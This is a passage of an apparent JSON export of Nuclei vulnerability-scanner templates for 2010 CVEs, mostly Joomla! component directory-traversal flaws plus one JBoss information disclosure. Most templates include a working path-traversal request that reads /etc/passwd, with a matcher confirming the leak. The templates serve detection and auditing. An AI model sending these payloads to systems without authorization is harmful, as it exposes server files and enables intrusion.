type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dd10b899ed886c29db67e5b79cf219545f680f39b12d5d8afbcc2bb0f48ad20702206c5a8174bb915705ddb88eee879ee3c44d6bb6924b51d8a2452e908474fe6e58:922c64590222798bb761d5b6d8e72950", "hash": "dc36e9994bea9986556a79c9a3619062", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7d" }, "name": "CVE-2010-1340.yaml", "content": "id: CVE-2010-1340\n\ninfo:\n name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n The vulnerability allows an attacker to include arbitrary local files, leading to remote code execution or sensitive information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/33797\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1340\n - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57123\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1340\n cwe-id: CWE-22\n epss-score: 0.01155\n epss-percentile: 0.83281\n cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla-research\n product: com_jresearch\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,joomla-research\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008afd34392382e5f6b19579d04b60518d4f35a6d45218dc673a8ef6c3f0e5207a022023ed93d4307ee15b5771ab85343fba0cc623272b9ac9c067059ffec8e40939d4:922c64590222798bb761d5b6d8e72950", "hash": "fa041110575c58b8d4b70db86769c3ae", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7e" }, "name": "CVE-2010-1345.yaml", "content": "id: CVE-2010-1345\n\ninfo:\n name: Joomla! Component Cookex Agency CKForms - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/15453\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1345\n - http://www.exploit-db.com/exploits/11785\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1345\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cookex\n product: com_ckforms\n tags: cve2010,cve,lfi,edb,joomla,cookex\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203d0345bc171d83b4201aa878f8a267915ce9379a6fcc88c609476ecc452ecc4f02200bfc25daa3c0bb029d6639d3a22eba998fce947d379499b47a17083afbb0c816:922c64590222798bb761d5b6d8e72950", "hash": "23477588b6792ae9aee63dac8791ca1e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7f" }, "name": "CVE-2010-1352.yaml", "content": "id: CVE-2010-1352\n\ninfo:\n name: Joomla! Component Juke Box 1.7 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12084\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1352\n - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1352\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jooforge\n product: com_jukebox\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,jooforge\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d337364bec15e62a5e51894f00482a853c0b83de12621326180d670fe85be2550220100fd4c82fbacc8ea7654009879641cc7e3cbbd695d9c489fe313644a3fdf818:922c64590222798bb761d5b6d8e72950", "hash": "571fb9c21403e5fa8cd2a0d87f37be15", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e80" }, "name": "CVE-2010-1353.yaml", "content": "id: CVE-2010-1353\n\ninfo:\n name: Joomla! Component LoginBox - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in LoginBox component.\n reference:\n - https://www.exploit-db.com/exploits/12068\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1353\n - http://www.vupen.com/english/advisories/2010/0808\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57533\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1353\n cwe-id: CWE-22\n epss-score: 0.01751\n epss-percentile: 0.87665\n cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wowjoomla\n product: com_loginbox\n tags: cve,cve2010,joomla,lfi,edb,wowjoomla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022043fd12edb4a3a2a5476d0728b0371efefd549591b361970554bafd57766a5a7d0220319e614d046afdbc29519ddcf8c1b48b88a98655409e986e93b30e09366c7a41:922c64590222798bb761d5b6d8e72950", "hash": "f7644d129e5864dcac81b994cd17d17b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e81" }, "name": "CVE-2010-1354.yaml", "content": "id: CVE-2010-1354\n\ninfo:\n name: Joomla! Component VJDEO 1.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12102\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1354\n - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt\n - http://www.exploit-db.com/exploits/12102\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1354\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.73222\n cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ternaria\n product: com_vjdeo\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,ternaria\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203e7b0577bb4c487c2041c049e54955ba57fcef21993bed3ee4a35397e5093009022012c708fe0fd04232b8a6542de8c0b947b5f72f266a2755b9ec230c1503415d79:922c64590222798bb761d5b6d8e72950", "hash": "3383d9de106011d8e102dafbf8dc0b0e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e82" }, "name": "CVE-2010-1429.yaml", "content": "id: CVE-2010-1429\n\ninfo:\n name: Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure\n author: R12W4N\n severity: medium\n description: |\n Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. 
A remote attacker can obtain sensitive information about \"deployed web contexts\" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Apply the necessary patches or updates provided by Red Hat to fix the vulnerability.\n reference:\n - https://rhn.redhat.com/errata/RHSA-2010-0377.html\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1429\n - https://nvd.nist.gov/vuln/detail/CVE-2008-3273\n - http://marc.info/?l=bugtraq&m=132698550418872&w=2\n - http://securitytracker.com/id?1023918\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1429\n cwe-id: CWE-264\n epss-score: 0.00573\n epss-percentile: 0.77469\n cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: redhat\n product: jboss_enterprise_application_platform\n shodan-query: title:\"JBoss\"\n tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/status?full=true\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"JVM\"\n - \"memory\"\n - \"localhost/\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bdd3f2bcbf92f7f9b377bef80acf174a216abb0cb2acf3477efe856c2083c07702203e9b25701cd0278ddb795ca72e40c2c00dcb6e3924b009706b93a3f0d6416eac:922c64590222798bb761d5b6d8e72950", "hash": "91eb1b334fff9658426a9250632e890c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e83" }, "name": "CVE-2010-1461.yaml", "content": "id: CVE-2010-1461\n\ninfo:\n name: Joomla! 
Component Photo Battle 1.0.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! application.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12232\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1461\n - http://www.exploit-db.com/exploits/12232\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1461\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.73149\n cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gogoritas\n product: com_photobattle\n tags: cve,cve2010,joomla,lfi,photo,edb,gogoritas\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207a92c230e02820f5272be13d2ee12a3e2739ac81ac8868dfbbe2ff407522df0c0220517ba0c636efa561e00528f86bcb0cdb861bc0e5382c72f4cb8f11b5fffc3b89:922c64590222798bb761d5b6d8e72950", "hash": "30954e4ba33e33276ba2c4bd2fb2326e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e84" }, "name": "CVE-2010-1469.yaml", "content": "id: CVE-2010-1469\n\ninfo:\n name: Joomla! Component JProject Manager 1.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! 
allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12146\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1469\n - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt\n - http://www.exploit-db.com/exploits/12146\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1469\n cwe-id: CWE-22\n epss-score: 0.00813\n epss-percentile: 0.81406\n cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ternaria\n product: com_jprojectmanager\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,ternaria\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206c63f224a283f97a55ae4941e39f19ae06e9761cf123943f1b4d394ecef11ea9022100d2900835201e1b12398af58927fbaada9d98b609932bfc9f70d7c6263a16a705:922c64590222798bb761d5b6d8e72950", "hash": "9268ee317f5e44caf8273a5e35605487", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e85" }, "name": "CVE-2010-1470.yaml", "content": "id: CVE-2010-1470\n\ninfo:\n name: Joomla! Component Web TV 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! 
allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12166\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1470\n - http://www.exploit-db.com/exploits/12166\n - http://www.vupen.com/english/advisories/2010/0858\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1470\n cwe-id: CWE-22\n epss-score: 0.04616\n epss-percentile: 0.92373\n cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dev.pucit.edu.pk\n product: com_webtv\n tags: cve,cve2010,joomla,lfi,edb,dev.pucit.edu.pk\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022005af39fb89c8d8753e1bcb87009d6d4d1de2cb594ed2c7fd92db1d9971237aeb022100bec720c951ec411c59b60dbf4113ab4a22c3e29ca90e8e253aab3e7e0dec4e37:922c64590222798bb761d5b6d8e72950", "hash": "ab1310da86b8bbcb3be857e731f0b44b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e86" }, "name": "CVE-2010-1471.yaml", "content": "id: CVE-2010-1471\n\ninfo:\n name: Joomla! Component Address Book 1.5.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Update to the latest version of Joomla! Component Address Book or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12170\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1471\n - http://www.vupen.com/english/advisories/2010/0862\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1471\n cwe-id: CWE-22\n epss-score: 0.05684\n epss-percentile: 0.93171\n cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: b-elektro\n product: com_addressbook\n tags: cve,cve2010,joomla,lfi,edb,b-elektro\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ce9830af0a126d6aae7b0cbe9b7598011f30691e6f9066386c81c9fb4bf3c1bc022014f94fe6e238d285a780454bb05c33859277fe46440a3a38ce33dd5a9d376175:922c64590222798bb761d5b6d8e72950", "hash": "f1b7b4ca658e6853cec70b13c0950c71", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e87" }, "name": "CVE-2010-1472.yaml", "content": "id: CVE-2010-1472\n\ninfo:\n name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12167\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1472\n - http://www.exploit-db.com/exploits/12167\n - http://www.vupen.com/english/advisories/2010/0859\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1472\n cwe-id: CWE-22\n epss-score: 0.05684\n epss-percentile: 0.93171\n cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kazulah\n product: com_horoscope\n tags: cve,cve2010,joomla,lfi,edb,kazulah\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022058bbc0b32a0debf917a4482c1d2aaf6dd8d22f0d12d301863ab6f832fa4b7dc6022100cd4e71908a61f85fe54f802d0d68887c7e90055e562e68608ec4b42cb4de3736:922c64590222798bb761d5b6d8e72950", "hash": "ea1dff7934245b569d15bc2086959336", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e88" }, "name": "CVE-2010-1473.yaml", "content": "id: CVE-2010-1473\n\ninfo:\n name: Joomla! Component Advertising 0.25 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12171\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1473\n - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1473\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80104\n cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: johnmccollum\n product: com_advertising\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,johnmccollum\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100caea4647de08403d53042f0568175efd2710e43a5d7e4962fcdb653206899ef802204d6c39e2e96c51b1626db9d90b0417e114debda8ef2844386f4faaa68630e512:922c64590222798bb761d5b6d8e72950", "hash": "a37401c90f32787ac40bf46266acea44", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e89" }, "name": "CVE-2010-1474.yaml", "content": "id: CVE-2010-1474\n\ninfo:\n name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Update to the latest version of Joomla! Component Sweetykeeper or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12182\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1474\n - http://www.exploit-db.com/exploits/12182\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57662\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1474\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.83996\n cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: supachai_teasakul\n product: com_sweetykeeper\n tags: cve2010,cve,joomla,lfi,edb,supachai_teasakul\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210092cb1f73ab7dcae152bc21fe109528bd68ddf3cb5c508c1c4ba81eb03a062e0f022100d32c234d25d1101db43416910efd4e3e67f536d43d1ed0a150d56605181bc34f:922c64590222798bb761d5b6d8e72950", "hash": "625cb26876db9d065857ef94fcb98f69", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8a" }, "name": "CVE-2010-1475.yaml", "content": "id: CVE-2010-1475\n\ninfo:\n name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n The LFI vulnerability can allow an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code.\n remediation: |\n Update to the latest version of Joomla! Component Preventive And Reservation and apply any available patches or fixes to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12147\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1475\n - http://www.exploit-db.com/exploits/12147\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57652\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1475\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.83996\n cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ternaria\n product: com_preventive\n tags: cve,cve2010,edb,joomla,lfi,ternaria\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b79b632e011312d4f390807f69c5a574e87dd7c7f8e5645c0084a40ac2aaf84a0220638374eeade62a6c858f74603e82a9ff1c3f522a73e5268cfce3425a2bd72ae6:922c64590222798bb761d5b6d8e72950", "hash": "6e3e7cd7ef9f84e9a524034b6f9cb80c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8b" }, "name": "CVE-2010-1476.yaml", "content": "id: CVE-2010-1476\n\ninfo:\n name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12150\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1476\n - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt\n - http://www.alphaplug.com/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1476\n cwe-id: CWE-22\n epss-score: 0.03527\n epss-percentile: 0.90668\n cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: alphaplug\n product: com_alphauserpoints\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,alphaplug\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e223bbab6d530ae6a44d3bd78a373853c5148f44c8fc760b86463968a99c39260220014aad890aabb37a243d84a97dc63c543133a8974a8c00e2b56a558e85a93be3:922c64590222798bb761d5b6d8e72950", "hash": "a1d94f17f552450e02b65f7e39957301", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8c" }, "name": "CVE-2010-1478.yaml", "content": "id: CVE-2010-1478\n\ninfo:\n name: Joomla! Component Jfeedback 1.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
